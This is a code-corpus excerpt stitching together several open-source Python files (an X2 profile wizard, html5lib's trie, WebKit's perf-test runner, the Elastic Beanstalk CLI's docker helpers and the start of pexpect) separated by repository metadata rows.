# Dulwich can't handle detached head, so use a temp branch as a workaround
self.repo.refs.set_symbolic_ref('HEAD', 'refs/heads/temp')
self.repo['HEAD'] = o.id
build_index_from_tree(self.repo.path, self.repo.index_path(),
self.repo.object_store, o.tree)
# Make the deployment folder (if not there) and checkout files into it
if not os.path.isdir(x2ProfilerApp.x2swProfilesTgtPath):
os.makedirs(x2ProfilerApp.x2swProfilesTgtPath)
else:
# Cleanup the deployment destination
self.RmAllProfiles(x2ProfilerApp.x2swProfilesTgtPath)
build_index_from_tree(x2ProfilerApp.x2swProfilesTgtPath, self.repo.index_path(),
self.repo.object_store, o.tree)
#----------------------------------------------------------------------
def RmAllProfiles(self, path):
if not path.endswith('.x2sw'):
raise ValueError('The path to RmAllProfiles() does not appear to be correct!')
for root, dirs, files in os.walk(path):
if root == path:
if '.git' in dirs:
dirs.remove('.git')
if '.git' in files:
files.remove('.git')
if '.use_local' in files:
files.remove('.use_local')
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
shutil.rmtree(os.path.join(root, name))
dirs.remove(name)
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class X2ProfilerApp():
"""Main app class"""
#----------------------------------------------------------------------
def imagefile(self, filename):
if os.path.exists(os.path.join(os.path.dirname(__file__), "images", filename)):
return os.path.join(os.path.dirname(__file__), "images", filename)
else:
return os.path.join(os.path.split(os.path.split(__file__)[0])[0], "images", filename)
#----------------------------------------------------------------------
def DetermineProfilesPaths(self):
self.x2swProfilesTgtPath = os.path.join(os.path.expanduser('~'), '.x2sw')
if (os.path.exists(os.path.join(self.x2swProfilesTgtPath, '.use_local'))):
self.x2swProfilesTgtPath = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), '.x2sw')
self.x2swProfilesPath = os.path.abspath(os.path.dirname(sys.argv[0]))
self.x2swProfilesPath = os.path.join(self.x2swProfilesPath, '.x2sw')
#----------------------------------------------------------------------
def ReadOurVersion(self):
versionfile = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), VERSION_FILE)
if os.path.exists(versionfile):
with open(versionfile) as f:
self.ver = f.read().splitlines()
else:
self.ver = [ None ]
# Match string (major.minor.) use: vrsion_str_tocheck.startswith(ver_match_str)
self.ver_match_str = ""
if self.ver[0]:
ver = self.ver[0]
ver = ver[:ver.find('.', ver.find('.') + 1) + 1]
self.ver_match_str = ver
else:
self.ver = [ "" ]
#----------------------------------------------------------------------
def IsProfileCompatible(self):
compat_file = os.path.join(self.x2swProfilesPath, COMPAT_FILE)
we_are_compatible = False
match_strs = []
if os.path.exists(compat_file):
with open(compat_file) as f:
match_strs = f.read().splitlines()
for match_str in match_strs:
if self.ver[0] and self.ver[0].startswith(match_str):
we_are_compatible = True
break
return we_are_compatible
#----------------------------------------------------------------------
def UpdateCompatFile(self):
compat_file = os.path.join(self.x2swProfilesPath, COMPAT_FILE)
we_are_compatible = False
match_strs = []
if os.path.exists(compat_file):
with open(compat_file) as f:
match_strs = f.read().splitlines()
match_strs.append(self.ver_match_str)
if os.path.exists(self.x2swProfilesPath):
with open(compat_file, "w") as myfile:
for line in match_strs:
myfile.write(line + "\n")
return
#----------------------------------------------------------------------
def Run(self, onlyIfVersionCheckFails = False):
global x2ProfilerApp
x2ProfilerApp = self
self.DetermineProfilesPaths()
self.repo = None
self.changes = False
### for debugging ### self.repo_url = 'D:\\tmp\\.x2sw'
self.repo_url = 'https://github.com/dob71/x2sw_profiles.git'
self.selection = None
self.tmp_repo_path = None
# Read our version (x2ProfilerApp.ver array contains strings from version.txt)
self.ReadOurVersion()
# If running for version check only, be done if have copatible profiles
if onlyIfVersionCheckFails:
if self.IsProfileCompatible():
return
else:
msg = "The current profile is not compatible with X2SW v" + self.ver[0] + ". "\
"Would you like to run X2Profiler and download compatible set of profiles? "\
"\n\n"\
"Click [Cancel] to mark the currnet profile compatible and no loger display this message "\
"(dangerous, the app might no longer start). Click [No] to skip the update just for now. "\
"You'll be asked to update again next time app starts."\
"\n\n"\
"Profile path: " + self.x2swProfilesPath
res = wx.MessageBox(msg, style = wx.YES_NO|wx.CANCEL|wx.YES_DEFAULT|wx.ICON_QUESTION)
if res == wx.CANCEL:
self.UpdateCompatFile()
return
elif res == wx.NO:
return
image = wx.Image(self.imagefile("wiz.png"), wx.BITMAP_TYPE_PNG).ConvertToBitmap()
self.wizard = wiz.Wizard(None, -1, "X2 Profile Manager", image)
self.page1 = UpdateRepoPage(self.wizard, "Update Profiles")
self.page2 = DownloadingPage(self.wizard, "Downloading")
self.page3 = SelectProfilesPage(self.wizard, "Select Profile")
self.page4 = ChooseModePage(self.wizard, "Storage Mode")
self.page5 = DeployPage(self.wizard, "Deploy Profile")
self.page6 = ReportResultPage(self.wizard, "Deploying")
# Set the initial order of the pages
self.page1.SetNext(self.page2)
self.page2.SetPrev(self.page1)
self.page2.SetNext(self.page3)
self.page3.SetPrev(self.page1) # Always skip downloading page on the way back
self.page3.SetNext(self.page4)
self.page4.SetPrev(self.page3)
self.page4.SetNext(self.page5)
self.page5.SetPrev(self.page4)
self.page5.SetNext(self.page6)
self.page6.SetPrev(self.page5)
iconpath = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'x2.ico')
if os.path.exists(iconpath):
self.wizard.SetIcon(wx.Icon(iconpath,wx.BITMAP_TYPE_ICO))
self.wizard.Bind(wiz.EVT_WIZARD_PAGE_CHANGING, self.OnPageChanging)
self.wizard.Bind(wx.wizard.EVT_WIZARD_PAGE_CHANGED, self.OnPageChanged)
self.wizard.FitToPage(self.page1)
self.wizard.GetPageAreaSizer().Add(self.page1)
self.wizard.RunWizard(self.page1)
self.wizard.Destroy()
if not x2ProfilerApp.tmp_repo_path == None:
try:
shutil.rmtree(x2ProfilerApp.tmp_repo_path)
x2ProfilerApp.tmp_repo_path = None
except:
pass
return self.changes
#----------------------------------------------------------------------
def OnPageChanged(self, event):
cp = self.wizard.GetCurrentPage()
if hasattr(cp, 'Run'):
wx.CallAfter(cp.Run)
#----------------------------------------------------------------------
def OnPageChanging(self, event):
pg = event.GetPage()
if hasattr(pg, 'OnPageChanging'):
pg.OnPageChanging(event)
########################################################################
if __name__ == "__main__":
app = wx.App(False)
X2ProfilerApp().Run()
| gpl-3.0 | 2,277,148,858,392,293,600 | 40.854803 | 146 | 0.51235 | false |
WholeGrainGoats/servo | tests/wpt/web-platform-tests/tools/html5lib/html5lib/trie/py.py | 817 | 1763 | from __future__ import absolute_import, division, unicode_literals
from six import text_type
from bisect import bisect_left
from ._base import Trie as ABCTrie
class Trie(ABCTrie):
def __init__(self, data):
if not all(isinstance(x, text_type) for x in data.keys()):
raise TypeError("All keys must be strings")
self._data = data
self._keys = sorted(data.keys())
self._cachestr = ""
self._cachepoints = (0, len(data))
def __contains__(self, key):
return key in self._data
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self, prefix=None):
if prefix is None or prefix == "" or not self._keys:
return set(self._keys)
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
start = i = bisect_left(self._keys, prefix, lo, hi)
else:
start = i = bisect_left(self._keys, prefix)
keys = set()
if start == len(self._keys):
return keys
while self._keys[i].startswith(prefix):
keys.add(self._keys[i])
i += 1
self._cachestr = prefix
self._cachepoints = (start, i)
return keys
def has_keys_with_prefix(self, prefix):
if prefix in self._data:
return True
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
i = bisect_left(self._keys, prefix, lo, hi)
else:
i = bisect_left(self._keys, prefix)
if i == len(self._keys):
return False
return self._keys[i].startswith(prefix)
| mpl-2.0 | 1,897,480,550,322,918,000 | 25.313433 | 66 | 0.551333 | false |
fentas/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/performance_tests/perftestsrunner.py | 115 | 17309 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Run Inspector's perf tests in perf mode."""
import os
import json
import logging
import optparse
import time
import datetime
from webkitpy.common import find_files
from webkitpy.common.checkout.scm.detection import SCMDetector
from webkitpy.common.config.urls import view_source_url
from webkitpy.common.host import Host
from webkitpy.common.net.file_uploader import FileUploader
from webkitpy.performance_tests.perftest import PerfTestFactory
from webkitpy.performance_tests.perftest import DEFAULT_TEST_RUNNER_COUNT
_log = logging.getLogger(__name__)
class PerfTestsRunner(object):
_default_branch = 'webkit-trunk'
EXIT_CODE_BAD_BUILD = -1
EXIT_CODE_BAD_SOURCE_JSON = -2
EXIT_CODE_BAD_MERGE = -3
EXIT_CODE_FAILED_UPLOADING = -4
EXIT_CODE_BAD_PREPARATION = -5
_DEFAULT_JSON_FILENAME = 'PerformanceTestsResults.json'
def __init__(self, args=None, port=None):
self._options, self._args = PerfTestsRunner._parse_args(args)
if port:
self._port = port
self._host = self._port.host
else:
self._host = Host()
self._port = self._host.port_factory.get(self._options.platform, self._options)
self._host.initialize_scm()
self._webkit_base_dir_len = len(self._port.webkit_base())
self._base_path = self._port.perf_tests_dir()
self._timestamp = time.time()
self._utc_timestamp = datetime.datetime.utcnow()
@staticmethod
def _parse_args(args=None):
def _expand_path(option, opt_str, value, parser):
path = os.path.expandvars(os.path.expanduser(value))
setattr(parser.values, option.dest, path)
perf_option_list = [
optparse.make_option('--debug', action='store_const', const='Debug', dest="configuration",
help='Set the configuration to Debug'),
optparse.make_option('--release', action='store_const', const='Release', dest="configuration",
help='Set the configuration to Release'),
optparse.make_option("--platform",
help="Specify port/platform being tested (i.e. chromium-mac)"),
optparse.make_option("--builder-name",
help=("The name of the builder shown on the waterfall running this script e.g. google-mac-2.")),
optparse.make_option("--build-number",
help=("The build number of the builder running this script.")),
optparse.make_option("--build", dest="build", action="store_true", default=True,
help="Check to ensure the DumpRenderTree build is up-to-date (default)."),
optparse.make_option("--no-build", dest="build", action="store_false",
help="Don't check to see if the DumpRenderTree build is up-to-date."),
optparse.make_option("--build-directory",
help="Path to the directory under which build files are kept (should not include configuration)"),
optparse.make_option("--time-out-ms", default=600 * 1000,
help="Set the timeout for each test"),
optparse.make_option("--no-results", action="store_false", dest="generate_results", default=True,
help="Do no generate results JSON and results page."),
optparse.make_option("--output-json-path", action='callback', callback=_expand_path, type="str",
help="Path to generate a JSON file at; may contain previous results if it already exists."),
optparse.make_option("--reset-results", action="store_true",
help="Clears the content in the generated JSON file before adding the results."),
optparse.make_option("--slave-config-json-path", action='callback', callback=_expand_path, type="str",
help="Only used on bots. Path to a slave configuration file."),
optparse.make_option("--description",
help="Add a description to the output JSON file if one is generated"),
optparse.make_option("--no-show-results", action="store_false", default=True, dest="show_results",
help="Don't launch a browser with results after the tests are done"),
optparse.make_option("--test-results-server",
help="Upload the generated JSON file to the specified server when --output-json-path is present."),
optparse.make_option("--webkit-test-runner", "-2", action="store_true",
help="Use WebKitTestRunner rather than DumpRenderTree."),
optparse.make_option("--replay", dest="replay", action="store_true", default=False,
help="Run replay tests."),
optparse.make_option("--force", dest="use_skipped_list", action="store_false", default=True,
help="Run all tests, including the ones in the Skipped list."),
optparse.make_option("--profile", action="store_true",
help="Output per-test profile information."),
optparse.make_option("--profiler", action="store",
help="Output per-test profile information, using the specified profiler."),
optparse.make_option("--additional-drt-flag", action="append",
default=[], help="Additional command line flag to pass to DumpRenderTree "
"Specify multiple times to add multiple flags."),
optparse.make_option("--driver-name", type="string",
help="Alternative DumpRenderTree binary to use"),
optparse.make_option("--repeat", default=1, type="int",
help="Specify number of times to run test set (default: 1)."),
optparse.make_option("--test-runner-count", default=DEFAULT_TEST_RUNNER_COUNT, type="int",
help="Specify number of times to invoke test runner for each performance test."),
]
return optparse.OptionParser(option_list=(perf_option_list)).parse_args(args)
def _collect_tests(self):
test_extensions = ['.html', '.svg']
if self._options.replay:
test_extensions.append('.replay')
def _is_test_file(filesystem, dirname, filename):
return filesystem.splitext(filename)[1] in test_extensions
filesystem = self._host.filesystem
paths = []
for arg in self._args:
if filesystem.exists(filesystem.join(self._base_path, arg)):
paths.append(arg)
else:
relpath = filesystem.relpath(arg, self._base_path)
if filesystem.exists(filesystem.join(self._base_path, relpath)):
paths.append(filesystem.normpath(relpath))
else:
_log.warn('Path was not found:' + arg)
skipped_directories = set(['.svn', 'resources'])
test_files = find_files.find(filesystem, self._base_path, paths, skipped_directories, _is_test_file)
tests = []
for path in test_files:
relative_path = filesystem.relpath(path, self._base_path).replace('\\', '/')
if self._options.use_skipped_list and self._port.skips_perf_test(relative_path) and filesystem.normpath(relative_path) not in paths:
continue
test = PerfTestFactory.create_perf_test(self._port, relative_path, path, test_runner_count=self._options.test_runner_count)
tests.append(test)
return tests
def run(self):
if not self._port.check_build(needs_http=False):
_log.error("Build not up to date for %s" % self._port._path_to_driver())
return self.EXIT_CODE_BAD_BUILD
run_count = 0
repeat = self._options.repeat
while (run_count < repeat):
run_count += 1
tests = self._collect_tests()
runs = ' (Run %d of %d)' % (run_count, repeat) if repeat > 1 else ''
_log.info("Running %d tests%s" % (len(tests), runs))
for test in tests:
if not test.prepare(self._options.time_out_ms):
return self.EXIT_CODE_BAD_PREPARATION
unexpected = self._run_tests_set(sorted(list(tests), key=lambda test: test.test_name()))
if self._options.generate_results and not self._options.profile:
exit_code = self._generate_results()
if exit_code:
return exit_code
if self._options.generate_results and not self._options.profile:
test_results_server = self._options.test_results_server
if test_results_server and not self._upload_json(test_results_server, self._output_json_path()):
return self.EXIT_CODE_FAILED_UPLOADING
if self._options.show_results:
self._port.show_results_html_file(self._results_page_path())
return unexpected
def _output_json_path(self):
output_json_path = self._options.output_json_path
if output_json_path:
return output_json_path
return self._host.filesystem.join(self._port.perf_results_directory(), self._DEFAULT_JSON_FILENAME)
def _results_page_path(self):
return self._host.filesystem.splitext(self._output_json_path())[0] + '.html'
def _generate_results(self):
options = self._options
output_json_path = self._output_json_path()
output = self._generate_results_dict(self._timestamp, options.description, options.platform, options.builder_name, options.build_number)
if options.slave_config_json_path:
output = self._merge_slave_config_json(options.slave_config_json_path, output)
if not output:
return self.EXIT_CODE_BAD_SOURCE_JSON
output = self._merge_outputs_if_needed(output_json_path, output)
if not output:
return self.EXIT_CODE_BAD_MERGE
filesystem = self._host.filesystem
json_output = json.dumps(output)
filesystem.write_text_file(output_json_path, json_output)
template_path = filesystem.join(self._port.perf_tests_dir(), 'resources/results-template.html')
template = filesystem.read_text_file(template_path)
absolute_path_to_trunk = filesystem.dirname(self._port.perf_tests_dir())
results_page = template.replace('%AbsolutePathToWebKitTrunk%', absolute_path_to_trunk)
results_page = results_page.replace('%PeformanceTestsResultsJSON%', json_output)
filesystem.write_text_file(self._results_page_path(), results_page)
def _generate_results_dict(self, timestamp, description, platform, builder_name, build_number):
revisions = {}
for (name, path) in self._port.repository_paths():
scm = SCMDetector(self._host.filesystem, self._host.executive).detect_scm_system(path) or self._host.scm()
revision = scm.svn_revision(path)
revisions[name] = {'revision': revision, 'timestamp': scm.timestamp_of_revision(path, revision)}
meta_info = {
'description': description,
'buildTime': self._datetime_in_ES5_compatible_iso_format(self._utc_timestamp),
'platform': platform,
'revisions': revisions,
'builderName': builder_name,
'buildNumber': int(build_number) if build_number else None}
contents = {'tests': {}}
for key, value in meta_info.items():
if value:
contents[key] = value
for test, metrics in self._results:
for metric_name, iteration_values in metrics.iteritems():
if not isinstance(iteration_values, list): # We can't reports results without individual measurements.
continue
tests = contents['tests']
path = test.test_name_without_file_extension().split('/')
for i in range(0, len(path)):
is_last_token = i + 1 == len(path)
url = view_source_url('PerformanceTests/' + (test.test_name() if is_last_token else '/'.join(path[0:i + 1])))
tests.setdefault(path[i], {'url': url})
current_test = tests[path[i]]
if is_last_token:
current_test.setdefault('metrics', {})
assert metric_name not in current_test['metrics']
current_test['metrics'][metric_name] = {'current': iteration_values}
else:
current_test.setdefault('tests', {})
tests = current_test['tests']
return contents
@staticmethod
def _datetime_in_ES5_compatible_iso_format(datetime):
return datetime.strftime('%Y-%m-%dT%H:%M:%S.%f')
def _merge_slave_config_json(self, slave_config_json_path, contents):
if not self._host.filesystem.isfile(slave_config_json_path):
_log.error("Missing slave configuration JSON file: %s" % slave_config_json_path)
return None
try:
slave_config_json = self._host.filesystem.open_text_file_for_reading(slave_config_json_path)
slave_config = json.load(slave_config_json)
for key in slave_config:
contents['builder' + key.capitalize()] = slave_config[key]
return contents
except Exception, error:
_log.error("Failed to merge slave configuration JSON file %s: %s" % (slave_config_json_path, error))
return None
def _merge_outputs_if_needed(self, output_json_path, output):
if self._options.reset_results or not self._host.filesystem.isfile(output_json_path):
return [output]
try:
existing_outputs = json.loads(self._host.filesystem.read_text_file(output_json_path))
return existing_outputs + [output]
except Exception, error:
_log.error("Failed to merge output JSON file %s: %s" % (output_json_path, error))
return None
def _upload_json(self, test_results_server, json_path, host_path="/api/report", file_uploader=FileUploader):
url = "https://%s%s" % (test_results_server, host_path)
uploader = file_uploader(url, 120)
try:
response = uploader.upload_single_text_file(self._host.filesystem, 'application/json', json_path)
except Exception, error:
_log.error("Failed to upload JSON file to %s in 120s: %s" % (url, error))
return False
response_body = [line.strip('\n') for line in response]
if response_body != ['OK']:
try:
parsed_response = json.loads('\n'.join(response_body))
except:
_log.error("Uploaded JSON to %s but got a bad response:" % url)
for line in response_body:
_log.error(line)
return False
if parsed_response.get('status') != 'OK':
_log.error("Uploaded JSON to %s but got an error:" % url)
_log.error(json.dumps(parsed_response, indent=4))
return False
_log.info("JSON file uploaded to %s." % url)
return True
def _run_tests_set(self, tests):
result_count = len(tests)
failures = 0
self._results = []
for i, test in enumerate(tests):
_log.info('Running %s (%d of %d)' % (test.test_name(), i + 1, len(tests)))
start_time = time.time()
metrics = test.run(self._options.time_out_ms)
if metrics:
self._results.append((test, metrics))
else:
failures += 1
_log.error('FAILED')
_log.info('Finished: %f s' % (time.time() - start_time))
_log.info('')
return failures
| bsd-3-clause | -5,582,124,142,793,653,000 | 47.89548 | 144 | 0.617944 | false |
quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/ebcli/containers/commands.py | 5 | 8658 | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import json
import sys
from botocore.compat import six
from cement.utils.misc import minimal_logger
from ..core import fileoperations
from ..lib import utils
from ..objects.exceptions import ValidationError, CommandError
from ..resources.strings import strings
EXPOSE_CMD = 'EXPOSE'
FROM_CMD = 'FROM'
LATEST_TAG = ':latest'
NETWORK_SETTINGS_KEY = 'NetworkSettings'
PORTS_KEY = 'Ports'
HOST_PORT_KEY = 'HostPort'
STATE_KEY = 'State'
RUNNING_KEY = 'Running'
LOG = minimal_logger(__name__)
def pull_img(full_docker_path):
"""
Pulls a base image found in Dockerfile.
:param full_docker_path: str: path to the Dockerfile
:return: None
"""
img = _get_base_img(full_docker_path)
if not _is_tag_specified(img):
img += LATEST_TAG
_pull_img(img)
def build_img(docker_path, file_path=None):
"""
Builds a docker image using Dockerfile found in docker path.
:param docker_path: str: path of dir containing the Dockerfile
:param file_path: str: optional name of Dockerfile
:return: str: id of the new image
"""
opts = ['-f', file_path] if file_path else []
args = ['docker', 'build'] + opts + [docker_path]
output = _run_live(args)
return _grab_built_image_id(output)
def run_container(full_docker_path, image_id, host_port=None,
envvars_map=None, volume_map=None, name=None):
"""
Runs a Docker container. Container port comes from the Dockerfile,
which is mapped to the given host port.
:param full_docker_path: str: path to the Dockerfile
:param image_id: str: id of the image being used to run
:host_port: str: optional host port. Same as container port by default
:envvars_map: dict: optional key-val map of environment variables
:volume_map: dict: optional key-val map of host-container volume mounts
:name: str: optional name to be assigned to the container
:return: None
"""
container_port = _get_container_port(full_docker_path)
if host_port is None:
host_port = container_port
_run_container(image_id, container_port, host_port, envvars_map,
volume_map, name)
def rm_container(container_id, force=False):
"""
Remove a container.
:param container_id: str: the container's id or name
:param force: bool: force the removal of the container (SIGKILL)
:return None
"""
force_arg = ['-f'] if force else []
args = ['docker', 'rm'] + force_arg + [container_id]
_run_quiet(args)
def up(compose_path=None, allow_insecure_ssl=False):
"""
Build and run the entire app using services defined in docker-compose.yml.
:param compose_path: str: optional alternate path to docker-compose.yml
:param allow_insecure_ssl: bool: allow insecure connection to docker registry
:return None
"""
file_opt = ['-f', '{}'.format(compose_path)] if compose_path else []
insecure_ssl_opt = ['--allow-insecure-ssl'] if allow_insecure_ssl else []
args = file_opt + ['up'] + insecure_ssl_opt
LOG.debug(args)
_compose_run(args)
def _compose_run(args):
from ebcli.bundled._compose.cli.main import main as compose_run
compose_run(*args)
def get_container_lowlvl_info(container_id):
"""
Get a running container's low level info.
:param container_id: str: the running container's id or name
:return dict
"""
args = ['docker', 'inspect', container_id]
info = json.loads(_run_quiet(args))
return info[0]
def is_container_existent(container_id):
"""
Return whether container exists.
:param container_id: str: the id or name of the container to check
:return bool
"""
try:
get_container_lowlvl_info(container_id)
return True
except CommandError:
return False
def is_running(container_id):
"""
Return whether container is currently running.
:param container_id: str: the id or name of the container to check
:return bool
"""
try:
info = get_container_lowlvl_info(container_id)
return info[STATE_KEY][RUNNING_KEY]
except CommandError:
return False
def get_exposed_hostports(container_id):
"""
Get the host ports we exposed when we ran this container.
:param container_id: str: the id or name of the running container
:return list
"""
# Since we ran the container, we can guarantee that
# one host port and one or more container ports are exposed.
# Example of port_map:
#
# {'4848/tcp': None,
# '8080/tcp': [{'HostPort': '8080', 'HostIp': '0.0.0.0'}],
# '8181/tcp': None}
try:
port_map = _get_network_settings(container_id)[PORTS_KEY] or {}
return utils.flatten([[p[HOST_PORT_KEY] for p in ports]
for ports in six.itervalues(port_map) if ports])
except CommandError: # Not running
return []
def version():
args = ['docker', '--version']
version_str = _run_quiet(args)
# Format: Docker version 1.5.0, build a8a31ef
return version_str.split()[2].strip(',')
def compose_version():
args = ['docker-compose', '--version']
# Format: docker-compose 1.1.0
return _run_quiet(args).split()[-1]
def _get_network_settings(container_id):
info = get_container_lowlvl_info(container_id)
return info[NETWORK_SETTINGS_KEY]
def _pull_img(img):
args = ['docker', 'pull', img]
return _run_live(args)
def _grab_built_image_id(build_output):
last_line = build_output.split()[-1]
image_id = last_line.split()[-1]
return image_id
def _run_container(image_id, container_port, host_port, envvars_map,
volume_map, name):
port_mapping = '{}:{}'.format(host_port, container_port)
interactive_opt = ['-i']
pseudotty_opt = ['-t']
rm_container_on_exit_opt = ['--rm']
port_opt = ['-p', port_mapping]
envvar_opt = _get_env_opts(envvars_map)
volume_opt = _get_volume_opts(volume_map)
name_opt = ['--name', name] if name else []
opts = (interactive_opt + pseudotty_opt + rm_container_on_exit_opt +
port_opt + envvar_opt + volume_opt + name_opt)
args = ['docker', 'run'] + opts + [image_id]
return _run_live(args)
def _get_container_port(full_docker_path):
return _fst_match_in_dockerfile(full_docker_path,
lambda s: s.startswith(EXPOSE_CMD),
strings['local.run.noportexposed'])[1]
def _get_base_img(full_docker_path):
return _fst_match_in_dockerfile(full_docker_path,
lambda s: s.startswith(FROM_CMD),
strings['local.run.nobaseimg'])[1]
def _fst_match_in_dockerfile(full_docker_path, predicate, not_found_error_msg):
raw_lines = fileoperations.readlines_from_text_file(full_docker_path)
stripped_lines = (x.strip() for x in raw_lines)
try:
line = next(x for x in stripped_lines if predicate(x))
return line.split()
except StopIteration:
raise ValidationError(not_found_error_msg)
def _is_tag_specified(img_name):
return ':' in img_name
def _get_env_opts(envvars_map):
return _get_opts(envvars_map, '--env', '{}={}')
def _get_volume_opts(volume_map):
return _get_opts(volume_map, '-v', '{}:{}')
def _get_opts(_map, opt_name, val_format):
_map = _map or {}
kv_pairs = six.iteritems(_map)
return utils.flatten([[opt_name, val_format.format(k, v)] for k, v
in kv_pairs])
def _run_quiet(args):
try:
return utils.exec_cmd_quiet(args)
except CommandError as e:
_handle_command_error(e)
def _run_live(args):
try:
return utils.exec_cmd_live_output(args)
except CommandError as e:
_handle_command_error(e)
def _handle_command_error(e):
socket_perm_msg = "dial unix /var/run/docker.sock: permission denied."
if socket_perm_msg in e.output:
raise CommandError(strings['local.run.socketperms'], e.output, e.code)
else:
raise CommandError
| mit | 7,421,618,116,844,425,000 | 28.349153 | 81 | 0.642065 | false |
yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/pexpect/__init__.py | 1 | 83018 | '''Pexpect is a Python module for spawning child applications and controlling
them automatically. Pexpect can be used for automating interactive applications
such as ssh, ftp, passwd, telnet, etc. It can be used to a automate setup
scripts for duplicating software package installations on different servers. It
can be used for automated software testing. Pexpect is in the spirit of Don
Libes' Expect, but Pexpect is pure Python. Other Expect-like modules for Python
require TCL and Expect or require C extensions to be compiled. Pexpect does not
use C, Expect, or TCL extensions. It should work on any platform that supports
the standard Python pty module. The Pexpect interface focuses on ease of use so
that simple tasks are easy.
There are two main interfaces to the Pexpect system; these are the function,
run() and the class, spawn. The spawn class is more powerful. The run()
function is simpler than spawn, and is good for quickly calling program. When
you call the run() function it executes a given program and then returns the
output. This is a handy replacement for os.system().
For example::
pexpect.run('ls -la')
The spawn class is the more powerful interface to the Pexpect system. You can
use this to spawn a child program then interact with it by sending input and
expecting responses (waiting for patterns in the child's output).
For example::
child = pexpect.spawn('scp foo [email protected]:.')
child.expect('Password:')
child.sendline(mypassword)
This works even for commands that ask for passwords or other input outside of
the normal stdio streams. For example, ssh reads input directly from the TTY
device which bypasses stdin.
Credits: Noah Spurrier, Richard Holden, Marco Molteni, Kimberley Burchett,
Robert Stone, Hartmut Goebel, Chad Schroeder, Erick Tryzelaar, Dave Kirby, Ids
vander Molen, George Todd, Noel Taylor, Nicolas D. Cesar, Alexander Gattin,
Jacques-Etienne Baudoux, Geoffrey Marshall, Francisco Lourenco, Glen Mabey,
Karthik Gurusamy, Fernando Perez, Corey Minyard, Jon Cohen, Guillaume
Chazarain, Andrew Ryan, Nick Craig-Wood, Andrew Stone, Jorgen Grahn, John
Spiegel, Jan Grant, and Shane Kerr. Let me know if I forgot anyone.
Pexpect is free, open source, and all that good stuff.
http://pexpect.sourceforge.net/
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
try:
import os
import sys
import time
import select
import re
import struct
import resource
import types
import pty
import tty
import termios
import fcntl
import errno
import traceback
import signal
import codecs
except ImportError: # pragma: no cover
err = sys.exc_info()[1]
raise ImportError(str(err) + '''
A critical module was not found. Probably this operating system does not
support it. Pexpect is intended for UNIX-like operating systems.''')
__version__ = '3.1'
__revision__ = ''
__all__ = ['ExceptionPexpect', 'EOF', 'TIMEOUT', 'spawn', 'spawnu', 'run', 'runu',
'which', 'split_command_line', '__version__', '__revision__']
PY3 = (sys.version_info[0] >= 3)
# Exception classes used by this module.
class ExceptionPexpect(Exception):
'''Base class for all exceptions raised by this module.
'''
def __init__(self, value):
super(ExceptionPexpect, self).__init__(value)
self.value = value
def __str__(self):
